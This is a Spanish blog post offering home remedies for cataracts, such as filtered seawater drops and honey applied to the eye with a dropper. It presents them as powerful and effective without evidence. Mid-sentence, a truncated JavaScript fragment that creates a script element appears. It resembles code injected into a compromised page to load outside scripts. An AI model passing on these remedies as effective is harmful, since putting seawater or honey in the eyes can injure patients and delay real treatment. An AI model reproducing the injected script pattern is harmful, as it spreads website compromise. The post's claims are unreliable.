Salud y belleza » Enfermedades

Remedios populares contra las cataratas (I)

1 Comentario

Tener cataratas equivale a cambiar un LCD para, en su reemplazo, volver a utilizar un antiguo TV blanco y negro con lluvia. Efectivamente, muchos enfermos, al curarse de su grado de cataratas, no pueden creer la diferencia: así de complicado es padecer esa clase de patología. Y, de hecho, muchas personas confían en la cirugía (necesaria, desde ya) pero le restan importancia a otras herramientas como la naturopatía.

En este análisis presentamos, justamente, algunos de los mejores consejos y remedios caseros para combatir las cataratas y poder ver en FULL HD.

- Colocar no más de cinco gotas de agua marina filtrada (se consiguen fácilmente en herboristerías) sobre la zona ocular antes de ir a dormir. Como este remedio puede irritar los ojos, se recomienda usarlo poco; solo cuando se llegan a situaciones “pico” de la catarata. Es poderoso y efectivo.

- Aplicar, únicamente mediante el uso estricto de un cuentagotas, miel natural en la zona del borde del ojo para que, lentamente, lo penetre. El sistema y por ende las precauciones son idénticas al caso anterior: usar con cuidado y, entre una aplicación y otra, dejar pasar varias semanas.var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : ,

One Comment »

  • Bitacoras.com said:

    Información Bitacoras.com…

    Valora en Bitacoras.com: Tener cataratas equivale a cambiar un LCD para, en su reemplazo, volver a utilizar un antiguo TV blanco y negro con lluvia. Efectivamente, muchos enfermos, al curarse de su grado de cataratas, no pueden creer la diferencia: a…..

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.